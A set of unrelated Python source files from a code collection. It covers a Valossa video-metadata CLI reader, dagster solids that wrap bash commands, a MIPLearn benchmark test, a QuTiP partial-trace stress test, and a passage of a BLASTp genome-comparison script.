"nb_cell_x" : nb_cell_x, "nb_cell_y" : nb_cell_y, "nb_cell_z" : nb_cell_z,
"do_load_balance" : do_load_balance
}
z = s.substitute(d)
print(z)
print("TotalNbCell=",total_nb_cell," (per part=",total_nb_cell//total_nb_part,")")
case_file = open("test.arc",mode="w")
case_file.write(z)
case_file.close()
command = [ args.arcane_driver_path, "launch", "-n", str(nb_proc), "-m", str(args.max_iteration), "-We,ARCANE_NEW_MESHINIT,1", "test.arc" ]
print(command)
subprocess.run(command)
| 2.234375 | 2 |
metareader/__main__.py | valossalabs/metadata-reader | 2 | 12765065 | <filename>metareader/__main__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# PYTHON_ARGCOMPLETE_OK
"""Command-line user interface
"""
from __future__ import print_function, unicode_literals
from __future__ import absolute_import
from __future__ import division
import sys
from site import USER_BASE
import os
import errno
from io import open
import argparse
import logging
logger = logging.getLogger(__name__)
# import argcomplete
try:
# Python 3.0 and later
from urllib.request import urlopen
from urllib.error import HTTPError
except ImportError:
# Python 2
from urllib2 import urlopen
from urllib2 import HTTPError
import json
__dev__ = True
def restricted_float(float_arg):
"""float [0.0, 1.0]"""
float_arg = float(float_arg)
if float_arg < 0.0 or float_arg > 1.0:
raise argparse.ArgumentTypeError("{} not in range [0.0, 1.0]".format(
float_arg))
return float_arg
def positive_int(int_arg):
"""int [1,2,3,4,...]"""
int_arg = int(int_arg)
if int_arg <= 0:
raise argparse.ArgumentTypeError("{} is not positive integer".format(
int_arg))
return int_arg
def image_size(xy_str):
from ast import literal_eval
x, y = literal_eval(xy_str)
return tuple((positive_int(x), positive_int(y)))
def load_json(file_url_or_path):
"""Returns contents of file located in argument from path or url."""
try:
# INPUT FILE AS URL
json_file = urlopen(file_url_or_path)
loaded_json = json.loads(json_file.read())
except ValueError: # invalid URL
# INPUT FILE AS PATH
with open(file_url_or_path, "r", encoding="utf-8") as json_file:
loaded_json = json.loads(json_file.read())
finally:
try:
json_file.close()
except:
# s there any error here I would like to catch really?
pass
return loaded_json
def input_metadata(file_url_or_path):
try:
metadata = load_json(file_url_or_path)
except HTTPError as error_msg:
raise argparse.ArgumentTypeError("Invalid url: {}\n{}".format(
file_url_or_path, error_msg))
except IOError as error_msg:
raise argparse.ArgumentTypeError(
"No such file found: {}\n{}".format(
file_url_or_path, error_msg)
)
except ValueError as error_msg:
raise argparse.ArgumentTypeError(
"Input file not valid JSON-file: {}\n{}".format(
file_url_or_path, error_msg)
)
return metadata
class ValidateExternalOntology(argparse.Action):
# Source: https://stackoverflow.com/a/8624107
def __call__(self, parser, args, values, option_string=None):
choices = ('gkg',)
ontology, concept_id = values
if ontology not in choices:
msg = "invalid choice: '{}' (currently supported external ontologies are: {})".format(
ontology, ", ".join(c for c in choices))
raise argparse.ArgumentError(self, msg)
setattr(args, self.dest, tuple((ontology, concept_id)))
class AddArguments:
@staticmethod
def list_detections(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default="csv", choices=["csv", "free"],
help="Choose one of the supported output formats."
)
parser.add_argument(
"-n", "--n-most-prominent-detections-per-type", type=positive_int, metavar="N",
help=("List only N most prominent detections from each detection type, "
"N given by user")
)
parser.add_argument(
"-t", "--detection-types", default=None,
metavar="TYPE", nargs="+",
help="Space-separated list of detection types to read."
)
parser.add_argument(
"-c", "--category", default=None,
metavar="CATEGORY", nargs="+",
help="Space separated list of categories."
)
parser.add_argument(
"-l", "--detection-label", default=None, metavar="LABEL",
help=("Detection label to read. "
"Example: dog")
)
parser.add_argument(
"-p", "--detection-persons", "--similar-to", default=None, metavar="PERSON",
help=("Comma-separated list of person names to read. Example: "
"\"<NAME>,*Willis\"")
)
parser.add_argument(
"-i", "--detection-valossa-cid", default=None, metavar="ID",
help="Valossa Concept ID to read. Example: \"sEl5Jb8H_WG7\""
)
parser.add_argument(
"--detection-external-concept-id", nargs=2, action=ValidateExternalOntology, metavar=("ONTOLOGY", "ID"),
help=("Name of external ontology followed by Concept ID to read. "
"Example: gkg \"/m/01j61q\"")
)
parser.add_argument(
"--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
"entries below 0.5 confidence. Note that some detection types does not have confidence "
"field and in that case this argument is ignored.")
)
parser.add_argument(
"--sort-by", default="detection_id",
choices=["prominence", "detection_id"],
help="Sort by selected method. Default: sort by detection ID"
)
parser.add_argument(
"--extra-header", nargs="+",
choices=["similar_to", "gender", "text"],
help="Use this option to select extra headers for output."
)
@staticmethod
def list_detections_by_second(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default="csv", choices=["csv", "free", "srt"],
help="Choose one of the supported output formats."
)
parser.add_argument(
"-t", "--detection-types", default=None,
metavar="TYPE", nargs="+",
help="Space-separated list of detection types to read."
)
parser.add_argument(
"-c", "--category", default=None,
metavar="CATEGORY", nargs="+",
help=("Space separated list of categories. Asterisk (*) "
"wildcards can be used. If used from shell, remember to use "
"quotation marks with asterisk. Example: human.face,\"*iab*\"")
)
parser.add_argument(
"-l", "--detection-label", default=None, metavar="LABEL", # TODO: Output occurrences too?
help=("Detection label to read. "
"Example: dog")
)
parser.add_argument(
"-p", "--detection-persons", "--similar-to", default=None, metavar="PERSON",
help=("Comma-separated list of person names to read. Example: "
"\"<NAME>,*Willis\"")
)
parser.add_argument(
"-i", "--detection-valossa-cid", default=None, metavar="ID",
help="Valossa Concept ID to read. Example: \"sEl5Jb8H_WG7\""
)
parser.add_argument(
"--detection-external-concept-id", nargs=2, action=ValidateExternalOntology, metavar=("ONTOLOGY", "ID"),
help=("Name of external ontology followed by Concept ID to read. "
"Example: gkg \"/m/01j61q\"")
)
parser.add_argument(
"--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
"entries below 0.5 confidence. Note that some detection types does not have confidence "
"field and in that case this argument is ignored.")
)
parser.add_argument(
"--start-second", type=int, default=0,
help=("Specifies the start-position of the examined time interval as seconds from "
"beginning (default: 0)")
)
parser.add_argument(
"--length-seconds", type=int, default=None,
help=("Specifies the length of the examined time interval as seconds. If left out, "
"then all remaining seconds after the --start-second position are examined")
)
parser.add_argument(
"--end-second", type=int, default=None,
help=("Specifies the end-position of the examined time interval as seconds from "
"beginning (default: until the end of video)")
)
parser.add_argument(
"--short", action="store_true",
help=("Shorter version. Each row has timestamp followed by labels detected at that time. Note that each "
"row has variable amount of labels so csv might not be as usable.")
)
parser.add_argument(
"--sentiment", action="store_true",
help=("List sentimental data in the core metadata file. Sentiment Analysis is not currently"
"part of the Core Capabilities, so be sure to enable it beforehand.")
)
parser.add_argument(
"--extra-header", nargs="+",
choices=["similar_to", "gender", "valence", "text"],
help="Use this option to select extra headers for output."
)
@staticmethod
def list_categories(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default="csv", choices=["csv", "free"],
help="Choose one of the supported output formats."
)
parser.add_argument(
"-t", "--detection-types", default=None,
metavar="TYPE", nargs="+",
help="Space-separated list of detection types to read."
)
parser.add_argument(
"-c", "--category", default=None,
metavar="CATEGORY", nargs="+",
help="Space separated list of categories."
)
parser.add_argument(
"--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
"entries below 0.5 confidence. Note that some detection types does not have confidence "
"field and in that case this argument is ignored.")
)
parser.add_argument(
"--start-second", type=int, default=0,
help=("Specifies the start-position of the examined time interval as seconds from "
"beginning (default: 0)")
)
parser.add_argument(
"--length-seconds", type=int, default=None,
help=("Specifies the length of the examined time interval as seconds. If left out, "
"then all remaining seconds after the --start-second position are examined")
)
parser.add_argument(
"--end-second", type=int, default=None,
help=("Specifies the end-position of the examined time interval as seconds from "
"beginning (default: until the end of video)")
)
parser.add_argument(
"-n", "--n-most-longest", type=positive_int, metavar="N",
help="List only N longest categories " # TODO: from each detection type
)
@staticmethod
def list_occurrences(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default="csv", choices=["csv", "free"],
help="Choose one of the supported output formats."
)
parser.add_argument(
"-t", "--detection-types", default=None,
metavar="TYPES", nargs="+",
help="Space-separated list of detection types to read."
)
parser.add_argument(
"-c", "--category", default=None,
metavar="CATEGORY", nargs="+",
help="Space separated list of category tags."
)
parser.add_argument(
"-l", "--detection-label", default=None, metavar="LABEL", # TODO: Output occurrences too?
help=("Detection label to read. "
"Example: dog")
)
parser.add_argument(
"-p", "--detection-persons", "--similar-to", default=None, metavar="PERSON",
help=("Comma-separated list of person names to read. Example: "
"\"<NAME>,*Willis\"")
)
parser.add_argument(
"-i", "--detection-valossa-cid", default=None, metavar="ID",
help="Valossa Concept ID to read. Example: \"sEl5Jb8H_WG7\""
)
parser.add_argument(
"--detection-external-concept-id", nargs=2, action=ValidateExternalOntology, metavar=("ONTOLOGY", "ID"),
help=("Name of external ontology followed by Concept ID to read. "
"Example: gkg \"/m/01j61q\"")
)
parser.add_argument(
"--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
"entries below 0.5 confidence. Note that some detection types does not have confidence "
"field and in that case this argument is ignored.")
)
parser.add_argument(
"--start-second", type=float, default=None,
help=("Specifies the start-position of the examined time interval as seconds from "
"beginning (default: 0)")
)
parser.add_argument(
"--length-seconds", type=float, default=None,
help=("Specifies the length of the examined time interval as seconds. If left out, "
"then all remaining seconds after the --start-second position are examined")
)
parser.add_argument(
"--end-second", type=float, default=None,
help=("Specifies the end-position of the examined time interval as seconds from "
"beginning (default: until the end of video)")
)
parser.add_argument(
"--sort-by", default=None,
choices=["start_second", "valence", "duration"],
help=("Sort by selected method. Items that do not have selected property will not be "
"listed at all. Default: sort by detection ID")
)
parser.add_argument(
"--extra-header", nargs="+",
choices=["valence", "similar_to", "text"],
help="Use this option to select extra headers for output."
)
@staticmethod
def metadata_info(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default="free", choices=["csv", "free"],
help="Choose one of the supported output formats."
)
@staticmethod
def summary(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default="csv", choices=["csv", "free"],
help="Choose one of the supported output formats."
)
parser.add_argument(
"-t", "--detection-type", default=None, metavar="TYPE",
# choices={"visual.context", "audio.context", "human.face"},
help="Detection type to read"
)
parser.add_argument(
"-c", "--category", default=None,
metavar="CATEGORY", nargs="+",
help=("Category tag to read. All available category tags can be found at "
"apidocs: https://portal.valossa.com/portal/apidocs#detectioncategories.")
)
parser.add_argument(
"-n", "--n-most-prominent-detections-per-type", type=positive_int, metavar="N",
help=("List only N most prominent detections from each detection type, "
"N given by user") # TODO: Word prominent might be bad here.
)
parser.add_argument(
"--separate-face-identities", action="store_true",
help=("Summary merges human.face identities with same similar_to -field. "
"Use this if you wish to prevent this merging.")
)
parser.add_argument(
"--skip-unknown-faces", action="store_true",
help="Remove the human.face detections missing similar_to -field from listing."
)
parser.add_argument(
"--emotion", action="store_true",
help="Show available emotion data."
)
@staticmethod
def plot(parser):
parser.add_argument(
"metadata_file", type=input_metadata,
help="Valossa Core metadata file to examine"
)
parser.add_argument(
"--output-file", default=None, metavar="FILE",
help="Output results to FILE instead of stdout."
)
parser.add_argument(
"-f", "--output-format",
default=None,
help=("Choose one of the supported output formats. Supported formats depend "
"on your system configuration.")
)
parser.add_argument(
"--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
"entries below 0.5 confidence. Note that some detection types does not have confidence "
"field and in that case this argument is ignored.")
)
required_arguments = parser.add_argument_group("required arguments")
plot_type = required_arguments.add_mutually_exclusive_group(required=True)
plot_type.add_argument(
"--bar-summary", action="store_true",
help=("Gives presentation of detection time of each label in chosen type "
"as bar chart.")
)
plot_type.add_argument(
"--transcript-sentiment-graph", action="store_true",
help="If you have enabled sentimental analysis, you can use this to output valence and intensity images."
)
plot_type.add_argument(
"--face-sentiment-graph", action="store_true",
help=("If you have enabled sentimental analysis, you can use this to output facial valence each in their "
"own image file.")
)
# Bar-plot, required arguments
required_bar_plot = parser.add_argument_group("required arguments for bar-summary")
required_bar_plot.add_argument(
"-n", "--n-most-prominent-detections-per-type", type=positive_int, required="--bar-summary" in sys.argv,
metavar="N",
help=("List only N most prominent detections from chosen detection type, "
"N given by user")
)
required_bar_plot.add_argument(
"-t", "--detection-type", default=None, metavar="TYPE",
# choices={"visual.context", "audio.context", "human.face"},
required="--bar-summary" in sys.argv,
help="Detection type to read"
)
# Plot, optional arguments
# plot_file = parser.add_mutually_exclusive_group()
# plot_file.add_argument(
# "--output-file", default=None,
# help="Choose filename to save result to. Output format will be parsed from "
# "filename. If filename is already taken program will add (n) after the name."
# )
parser.add_argument(
"--image-size", default=None, type=image_size,
help="Resolution in pixels"
)
# Bar-plot, optional arguments
parser.add_argument(
"--separate-face-identities", action="store_true",
help=("On default merges human.face identities with same similar_to -field. "
"Use this if you wish to prevent this merging.")
)
parser.add_argument(
"--skip-unknown-faces", action="store_true",
help="Remove the human.face detections missing similar_to -field from listing."
)
# Plot trans/face, optional arguments
parser.add_argument(
"--simple", action="store_true",
help="Create 'trinary' image with three values being 'positive', 'neutral' and 'negative'"
)
parser.add_argument(
"--show-title", action="store_true",
help="Read video title from metadata and insert to image."
)
def parse_user_arguments():
"""Parse given arguments and return parsed arguments
:return: Dictionary containing the arguments
"""
parser = argparse.ArgumentParser(
prog="metareader",
description="Helper tool to read Valossa Core metadata.",
epilog=("A few example commands:\n"
"metareader summary metadata_example.json -f free -n10\n"
"metareader list-detections metadata_example.json -t\"visual.context\""),
formatter_class=argparse.RawDescriptionHelpFormatter,
)
subparsers = parser.add_subparsers(dest="mode", metavar="MODE", help="Select one of the following modes.")
subparsers.required = True
# LIST-DETECTIONS
# ---------------
list_detections = subparsers.add_parser(
"list-detections",
help="List detections without looking into the by_second structure."
)
AddArguments.list_detections(list_detections)
# LIST-DETECTIONS-BY-SECOND
# -------------------------
list_detections_by_second = subparsers.add_parser(
"list-detections-by-second",
help=("List detections for each second, by looking into the by_second "
"structure (note: this obviously lists only time-bound detections, "
"so for example IAB categories are NOT listed in this mode).")
)
AddArguments.list_detections_by_second(list_detections_by_second)
# LIST-CATEGORIES
# ---------------
list_categories = subparsers.add_parser(
"list-categories",
help="List category tags."
)
AddArguments.list_categories(list_categories)
# LIST-OCCURRENCES
# ---------------
list_occurrences = subparsers.add_parser(
"list-occurrences",
help="List all occurrences for one or multiple detections."
)
AddArguments.list_occurrences(list_occurrences)
# SUMMARY
# -------
summary = subparsers.add_parser(
"summary",
help=("Create summary view of detections based on total occurrence time of the detections. "
"Percent values are related to total length of the video.")
)
AddArguments.summary(summary)
# PLOT
# ----
plot = subparsers.add_parser(
"plot",
help="Plot chosen metadata type into bar chart. Output will be saved to a file."
)
AddArguments.plot(plot)
# METADATA-INFO
# -------------
metadata_info = subparsers.add_parser(
"metadata-info",
help="List information about metadatafile"
)
AddArguments.metadata_info(metadata_info)
# argcomplete.autocomplete(parser) # TODO: configure argcomplete for Valossa detection types etc.
args = parser.parse_args()
return vars(args)
def plot_handler(mdr, **kwargs):
"""Gets data, plots it and returns exit code.
:param mdr: MetadataReader-object
:param kwargs: arguments
:return: exit code for main function
:rtype int
"""
from . import mdplotter
if kwargs.get("show_title"):
kwargs["video_title"] = mdr.video_title
if kwargs.get("bar_summary"):
list_generator = mdr.list_summary(addition_method="union", **kwargs)
plotter = mdplotter.MetadataPlotter(**kwargs)
plotter.plot(next(list_generator)["summary"])
return 0
if kwargs.get("transcript_sentiment_graph") or kwargs.get("face_sentiment_graph"):
# Get data
graph_data = mdr.list_sentiment(**kwargs)
# Plot data
plotter = mdplotter.MetadataPlotter(**kwargs)
plotter.plot(graph_data, **kwargs)
return 0
return 1
def load_blacklist():
"""modify blaclist_file_locations for adding more possible locations and
their checking order
"""
blacklist_file_locations = [
os.path.join(USER_BASE, "metareader", "blacklist.json"),
os.path.join(os.path.dirname(os.path.realpath(__file__)), "blacklist.json"),
os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), "blacklist.json"),
]
for loc in blacklist_file_locations:
if os.path.exists(loc):
try:
return loc, load_json(loc)
except ValueError as e:
# Case blacklist.json not formatted correctly, perhaps customer edited it?
# Notify user:
print("blacklist.json not formatted correctly. You can either remove\n"
"the blacklist.json, restore it by reinstalling the software or\n"
"fix the format problem with following information from the decoder:\n"
"%s" % e, file=sys.stderr)
sys.exit(1)
# raise e from None # Works only for Python 3
except IOError as e: # Python 3: FileNotFoundError as e:
# Case blacklist.json can't be found at default location (or some other
# IO related error). Perhaps check alternative locations before moving on.
# Removing the file is valid solution to disable blacklist.
if __dev__:
raise
pass
return None, None
def main(**arguments):
from . import mdreader
from . import mdprinter
bl_path, blacklist = load_blacklist()
if blacklist is not None:
logger.debug("Loaded blacklist file from %s" % bl_path)
else:
logger.debug("Failed loading blacklist file from %s" % bl_path)
# Create instance of mdr = MetadataReader(json) with metadata-json as argument
mdr = mdreader.MetadataReader(arguments.pop('metadata_file'), blacklist=blacklist)
# Depending on arguments, call mdr.function(arguments).
mode = arguments.pop('mode')
if mode == 'list-detections':
list_generator = mdr.list_detections(**arguments)
elif mode == 'list-detections-by-second':
# Make sure all three match, discard "length_seconds" if all three given:
if arguments.get("start_second") and arguments.get("end_second"):
arguments["length_seconds"] = arguments["end_second"] - arguments["start_second"]
elif arguments.get("start_second") and arguments.get("length_seconds"):
arguments["end_second"] = arguments["start_second"] + arguments["length_seconds"]
elif arguments.get("length_seconds") and arguments.get("end_second"):
arguments["start_second"] = arguments["end_second"] - arguments["length_seconds"]
list_generator = mdr.list_detections_by_second(**arguments)
elif mode == 'list-categories':
list_generator = mdr.list_categories(**arguments)
elif mode == 'list-occurrences':
list_generator = mdr.list_occurrences(**arguments)
elif mode == 'summary':
list_generator = mdr.list_summary(**arguments)
elif mode == 'plot':
ex_code = plot_handler(mdr, **arguments)
sys.exit(ex_code)
elif mode == 'metadata-info':
mdr.metadata_info()
sys.exit(0)
else:
print("Error: Mode not supported" + mode, file=sys.stderr)
sys.exit(1)
try:
first_row = next(list_generator)
except mdreader.AppError as e:
raise RuntimeError("Error: " + str(e))
except StopIteration as e:
# logger.debug("Nothing found.")
return
#
# Set up printing method:
print_mode = arguments.get('output_format', None)
# Give the header row for printer:
if arguments.get('output_file') is None:
output_file = sys.stdout
else:
output_file = open(arguments.get('output_file'), "w", encoding="utf-8")
if print_mode == 'csv':
printer = mdprinter.MetadataCSVPrinter(first_row, output_file)
elif print_mode == 'free':
printer = mdprinter.MetadataFreePrinter(first_row, output_file)
elif print_mode == 'srt':
printer = mdprinter.MetadataSubtitlePrinter(first_row, output_file)
else:
if output_file is not sys.stdout:
output_file.close()
raise RuntimeError("Error: Print mode not supported", print_mode)
if arguments.get("short", False) and mode == 'list-detections-by-second':
for row in list_generator:
printer.print_line(row, combine=1)
else:
for row in list_generator:
printer.print_line(row)
if output_file is not sys.stdout:
output_file.close()
if __name__ == '__main__':
cmd_line_args = parse_user_arguments()
try:
main(**cmd_line_args)
except IOError as e: # Python 2 doesn't have BrokenPipeError
if e.errno != errno.EPIPE:
# Not a broken pipe
raise
pass
| 3 | 3 |
werkit/compute/__init__.py | metabolize/werk | 2 | 12765066 | """
Werkit's compute wrapper provides a structured, framework-agnostic execution
environment for running any Python code and validating its result using
[1schema][] (or plain JSON Schema). It automatically catches and serializes
errors, too.
By plugging in a werkit.compute.Destination object, you can upon completion send
the result to a queue (or any other destination, such at S3).
[1schema]: https://github.com/metabolize/1schema/
"""
from ._destination import Destination # noqa: F401
from ._manager import Manager # noqa: F401
from ._schema import Schema # noqa: F401
| 1.820313 | 2 |
python_modules/libraries/dagster-bash/dagster_bash/solids.py | flowersw/dagster | 3 | 12765067 | <gh_stars>1-10
import os
from dagster import (
Enum,
EnumValue,
Failure,
Field,
InputDefinition,
Noneable,
Nothing,
OutputDefinition,
Permissive,
check,
solid,
)
from .utils import execute, execute_script_file
def bash_command_solid(bash_command, name='bash_solid', input_defs=None, **kwargs):
'''This function is a factory which constructs a solid that will execute a Bash command.
Any kwargs passed to this function will be passed along to the underlying :func:`@solid
<dagster.solid>` decorator. However, note that overriding ``config`` or ``output_defs`` is not
supported.
You might consider using :func:`@composite_solid <dagster.composite_solid>` to wrap this solid
in the cases where you'd like to configure the bash solid with different config fields.
Examples:
.. literalinclude:: ../../../../../python_modules/libraries/dagster-bash/dagster_bash_tests/example_bash_command_solid.py
:language: python
Args:
bash_command (str): The shell command to execute.
name (str, optional): The name of this solid. Defaults to "bash_solid".
input_defs (List[InputDefinition], optional): input definitions for the solid. Defaults to
a single Nothing input.
Raises:
Failure: Raised when the shell command returns a non-zero exit code.
Returns:
SolidDefinition: Returns the constructed solid definition.
'''
check.str_param(bash_command, 'bash_command')
name = check.str_param(name, 'name')
check.opt_list_param(input_defs, 'input_defs', of_type=InputDefinition)
if 'output_defs' in kwargs:
raise TypeError('Overriding output_defs for bash solid is not supported.')
if 'config' in kwargs:
raise TypeError('Overriding config for bash solid is not supported.')
@solid(
name=name,
description=kwargs.pop('description', 'A solid to invoke a bash command.'),
input_defs=input_defs or [InputDefinition('start', Nothing)],
output_defs=[OutputDefinition(str, 'result')],
config=bash_solid_config(),
**kwargs
)
def _bash_solid(context):
output, return_code = execute(
bash_command=bash_command, log=context.log, **context.solid_config
)
if return_code:
raise Failure(
description='Bash command execution failed with output: {output}'.format(
output=output
)
)
return output
return _bash_solid
def bash_script_solid(bash_script_path, name='bash_script_solid', input_defs=None, **kwargs):
'''This function is a factory which constructs a solid that will execute a Bash command read
from a script file.
Any kwargs passed to this function will be passed along to the underlying :func:`@solid
<dagster.solid>` decorator. However, note that overriding ``config`` or ``output_defs`` is not
supported.
You might consider using :func:`@composite_solid <dagster.composite_solid>` to wrap this solid
in the cases where you'd like to configure the bash solid with different config fields.
Examples:
.. literalinclude:: ../../../../../python_modules/libraries/dagster-bash/dagster_bash_tests/example_bash_script_solid.py
:language: python
Args:
bash_script_path (str): The script file to execute.
name (str, optional): The name of this solid. Defaults to "bash_script_solid".
input_defs (List[InputDefinition], optional): input definitions for the solid. Defaults to
a single Nothing input.
Raises:
Failure: Raised when the shell command returns a non-zero exit code.
Returns:
SolidDefinition: Returns the constructed solid definition.
'''
check.str_param(bash_script_path, 'bash_script_path')
name = check.str_param(name, 'name')
check.opt_list_param(input_defs, 'input_defs', of_type=InputDefinition)
if 'output_defs' in kwargs:
raise TypeError('Overriding output_defs for bash solid is not supported.')
if 'config' in kwargs:
raise TypeError('Overriding config for bash solid is not supported.')
@solid(
name=name,
description=kwargs.pop('description', 'A solid to invoke a bash command.'),
input_defs=input_defs or [InputDefinition('start', Nothing)],
output_defs=[OutputDefinition(str, 'result')],
config=bash_solid_config(),
**kwargs
)
def _bash_script_solid(context):
output, return_code = execute_script_file(
bash_script_path=bash_script_path, log=context.log, **context.solid_config
)
if return_code:
raise Failure(
description='Bash command execution failed with output: {output}'.format(
output=output
)
)
return output
return _bash_script_solid
def bash_solid_config():
return {
'env': Field(
Noneable(Permissive()),
default_value=os.environ.copy(),
is_required=False,
description='An optional dict of environment variables to pass to the subprocess. '
'Defaults to using os.environ.copy().',
),
'output_logging': Field(
Enum(
name='OutputType',
enum_values=[
EnumValue('STREAM', description='Stream script stdout/stderr.'),
EnumValue(
'BUFFER',
description='Buffer bash script stdout/stderr, then log upon completion.',
),
EnumValue('NONE', description='No logging'),
],
),
is_required=False,
default_value='BUFFER',
),
'cwd': Field(
Noneable(str),
default_value=None,
is_required=False,
description='Working directory in which to execute bash script',
),
}
| 2.6875 | 3 |
tests/test_benchmark.py | neuyhwu/MIPLearn | 64 | 12765068 | # MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization
# Copyright (C) 2020-2021, UChicago Argonne, LLC. All rights reserved.
# Released under the modified BSD license. See COPYING.md for more details.
import os.path
from scipy.stats import randint
from miplearn.benchmark import BenchmarkRunner
from miplearn.problems.stab import MaxWeightStableSetGenerator
from miplearn.solvers.learning import LearningSolver
def test_benchmark() -> None:
for n_jobs in [1, 4]:
# Generate training and test instances
generator = MaxWeightStableSetGenerator(n=randint(low=25, high=26))
train_instances = generator.generate(5)
test_instances = generator.generate(3)
# Solve training instances
training_solver = LearningSolver()
training_solver.parallel_solve(train_instances, n_jobs=n_jobs) # type: ignore
# Benchmark
test_solvers = {
"Strategy A": LearningSolver(),
"Strategy B": LearningSolver(),
}
benchmark = BenchmarkRunner(test_solvers)
benchmark.fit(train_instances, n_jobs=n_jobs) # type: ignore
benchmark.parallel_solve(
test_instances, # type: ignore
n_jobs=n_jobs,
n_trials=2,
)
benchmark.write_csv("/tmp/benchmark.csv")
assert os.path.isfile("/tmp/benchmark.csv")
assert benchmark.results.values.shape == (12, 21)
| 2.34375 | 2 |
stress_tests/python/ptrace_qutip.py | Harmohit-Singh/qpp | 2 | 12765069 | <reponame>Harmohit-Singh/qpp
# QuTiP partial trace stress tests
import os
import qutip
import sys
import timeit
if len(sys.argv) != 3:
sys.exit("Please specify the number of cores and qubits!")
num_cores = int(sys.argv[1]) # number of cores
n = int(sys.argv[2]) # number of qubits
N = 2 ** n
os.environ['OPENBLAS_NUM_THREADS'] = str(num_cores)
os.environ['MKL_NUM_THREADS'] = str(num_cores)
qutip.settings.num_cpus = num_cores
result = qutip.rand_herm(N, dims=[[2] * n, [2] * n])
# start timing
start_time = timeit.default_timer()
# partial trace over the first qubit
result = result.ptrace(range(1, n))
elapsed = timeit.default_timer() - start_time
# end timing
print("{0}, {1}, {2}".format(num_cores, n, elapsed))
| 2.359375 | 2 |
Recipes/g2g_blastp.py | allista/BioUtils | 1 | 12765070 | <filename>Recipes/g2g_blastp.py
#!/usr/bin/python
# coding=utf-8
'''
Created on Dec 19, 2015
@author: <NAME> <<EMAIL>>
'''
import os
import signal
from time import sleep
from BioUtils.NCBI import BlastCLI
from reportlab.lib import colors
from BioUtils.Tools.tmpStorage import roDict, clean_tmp_files, shelf_result
_pid = -1
abort_event = None
def sig_handler(signal, frame):
if _pid != os.getpid(): return
print('\nAborting. This may take some time '
'as not all operations could be stopped immediately.\n')
abort_event.set(); sleep(0.1)
clean_tmp_files()
#end def
if __name__ == '__main__':
from multiprocessing import Event
from BioUtils.Tools.Output import user_message
from BioUtils.SeqUtils import load_files
_pid = os.getpid()
#setup signal handler
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTERM, sig_handler)
signal.signal(signal.SIGQUIT, sig_handler)
if True:
# from DegenPrimer import MultiprocessingBase
# MultiprocessingBase.cpu_count = 1
abort_event = Event()
lb = BlastCLI(abort_event)
with user_message('Loading genomes...', '\n'):
genomes_dir = u'/home/allis/Dropbox/Science/Микра/Thermococcus/sequence/GenBank/Thermococcus'
genome_names = ['Thermococcus_barophilus_Ch5-complete.gb',
'Thermococcus_onnurineus_NA1-complete-genome.gb',
'Thermococcus_sp._ES1.gb',
'Thermococcus-DS1-preliminary.gb']
genomes = load_files(abort_event, [os.path.join(genomes_dir, f) for f in genome_names], 'gb')
ref = genomes[0]
subj = genomes[1:]
@shelf_result
def g2g2shelf():
return lb.g2g_blastp(ref, subj, 11, features_of_interest=[{'ugene_name': 'FC-full'}, {'ugene_name': 'COC-full'}])
g2g_res = '/tmp/DP-PCR-N_KAEs'
if not os.path.isfile(g2g_res):
g2g_res = g2g2shelf()
print g2g_res
if g2g_res:
with roDict(g2g_res) as db:
results = db['result']
if results:
lb.g2g_to_csv('g2g_test.csv', ref, subj, results)
print 'Done.'
import numpy as np
import pandas
import matplotlib.pyplot as plt
from matplotlib import cm, rc
df = pandas.read_csv('g2g_test.csv')
df = df.dropna(subset=('Thermococcus_onnurineus_NA1_percent', 'Thermococcus_sp._ES1_percent'))
ratio = 15/18.0
rc('text', usetex=True)
rc('font', size=14)
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
fig, ax = plt.subplots(figsize=(12,12*ratio))
ax.set_xlabel(r'\textit{Thermococcus paralvinellae} \textsf{ES1}', fontsize=18)
ax.set_ylabel(r'\textit{Thermococcus onnurineus} \textsf{NA1}', fontsize=18)
plt.hist2d(np.array(df['Thermococcus_sp._ES1_percent']),
np.array(df.Thermococcus_onnurineus_NA1_percent),
range=[[20,100], [20,100]],
bins=80, cmap=cm.get_cmap('Blues'))
plt.colorbar()
plt.plot([20,100], [20,100], color='lightgrey', linestyle='--')
plt.plot([50,50], [20,100], color='lightgrey', linestyle='--')
plt.plot([20,100], [50,50], color='lightgrey', linestyle='--')
colors = ['darkorange']*2+['darkred']+['red']*6+['orange','darkgreen','darkviolet']+['black']*7
genes = df.Thermococcus_barophilus_Ch5_gene.isin(range(1737,1756))
